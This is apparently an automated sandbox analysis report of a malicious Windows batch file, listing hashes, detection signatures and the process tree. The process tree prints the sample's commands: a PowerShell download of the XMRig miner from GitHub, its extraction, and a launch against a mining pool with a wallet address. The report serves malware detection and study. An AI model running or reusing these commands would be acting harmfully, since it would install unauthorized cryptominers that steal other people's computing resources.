Overview
overview
10Static
static
11.bat
windows10-1703-x64
1010.bat
windows10-1703-x64
1011.bat
windows10-1703-x64
1012.bat
windows10-1703-x64
1013.bat
windows10-1703-x64
1014.bat
windows10-1703-x64
1015.bat
windows10-1703-x64
102.bat
windows10-1703-x64
103.bat
windows10-1703-x64
104.bat
windows10-1703-x64
105.bat
windows10-1703-x64
106.bat
windows10-1703-x64
107.bat
windows10-1703-x64
108.bat
windows10-1703-x64
109.bat
windows10-1703-x64
10Resubmissions
Analysis
-
max time kernel
315s -
max time network
1802s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
20-05-2024 20:53
Static task
static1
Behavioral task
behavioral1
Sample
1.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
10.bat
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
11.bat
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
12.bat
Resource
win10-20240404-en
Behavioral task
behavioral5
Sample
13.bat
Resource
win10-20240404-en
Behavioral task
behavioral6
Sample
14.bat
Resource
win10-20240404-en
Behavioral task
behavioral7
Sample
15.bat
Resource
win10-20240404-en
Behavioral task
behavioral8
Sample
2.bat
Resource
win10-20240404-en
Behavioral task
behavioral9
Sample
3.bat
Resource
win10-20240404-en
Behavioral task
behavioral10
Sample
4.bat
Resource
win10-20240404-en
Behavioral task
behavioral11
Sample
5.bat
Resource
win10-20240404-en
Behavioral task
behavioral12
Sample
6.bat
Resource
win10-20240404-en
Behavioral task
behavioral13
Sample
7.bat
Resource
win10-20240404-en
Behavioral task
behavioral14
Sample
8.bat
Resource
win10-20240404-en
General
-
Target
14.bat
-
Size
599B
-
MD5
798b979417aa88e5323ead9be2d8425c
-
SHA1
a54c5133c71afddf697f302b36bdb930c72852ce
-
SHA256
f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07
-
SHA512
a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b
Malware Config
Extracted
https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip
Signatures
-
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe family_xmrig C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe xmrig -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 3652 powershell.exe 4 3652 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
xmrig.exepid process 4884 xmrig.exe -
Processes:
powershell.exepowershell.exepid process 3652 powershell.exe 4488 powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 3652 powershell.exe 3652 powershell.exe 3652 powershell.exe 4488 powershell.exe 4488 powershell.exe 4488 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 672 -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exexmrig.exedescription pid process Token: SeDebugPrivilege 3652 powershell.exe Token: SeDebugPrivilege 4488 powershell.exe Token: SeLockMemoryPrivilege 4884 xmrig.exe Token: SeLockMemoryPrivilege 4884 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
xmrig.exepid process 4884 xmrig.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exedescription pid process target process PID 3272 wrote to memory of 3652 3272 cmd.exe powershell.exe PID 3272 wrote to memory of 3652 3272 cmd.exe powershell.exe PID 3272 wrote to memory of 4488 3272 cmd.exe powershell.exe PID 3272 wrote to memory of 4488 3272 cmd.exe powershell.exe PID 3272 wrote to memory of 4884 3272 cmd.exe xmrig.exe PID 3272 wrote to memory of 4884 3272 cmd.exe xmrig.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\14.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3652 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4488 -
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exexmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b142⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4884
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
Filesize
1KB
MD528762ef934e6ffa51a48924f65417b93
SHA14a9452aa8c937c78581e808ee1bade4e3b2933c6
SHA2567c9c4b03965881de71453583c37e375bd9d0841ec3f3476b88abb5cfdfde6717
SHA51236edb48f6e9d73ae66f5080dd7183bbe7fb00577b5ba4ee18390ff053ee5a8230c5c14e6cac2e8d00dad9dbd7a87c734a2209c34bf3ebd42b27bcdc5f359c740
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
2.5MB
MD5cef0ae1ab544e40b659261a4e07fe48f
SHA1e5ff855ce3c7726a50eb50a634ff9f406b3df093
SHA256713263085499ae626a6148fab67932c9a69611b21ac3d04cf52a5e23495f902e
SHA5121fb23b385e6cff3653f0b4b397d092c7be4df62899c97e18f675df2024e5f06ef2596fb626b85ae2ef7d7583c5bf54b00dba1a5ad566c2707a669a48d9814ba8
-
Filesize
6.1MB
MD5c0f8959614ae06561216158d78a787e5
SHA173167d1fd0cee1c96a6505606d21cbfe4369eb00
SHA256e199d88569fb54346d5fa20ee7b59b2ea6f16f4ecca3ea1e1c937b11aab7b2b0
SHA512a24fcf344d08c64ac301d5e4979f062b5e28e8e4acf1d2790916149ffe7726b0c4a11e0775aeba6b841d2d5081e1bd13e2b80390bf9bfbc44d67e54ec07cd746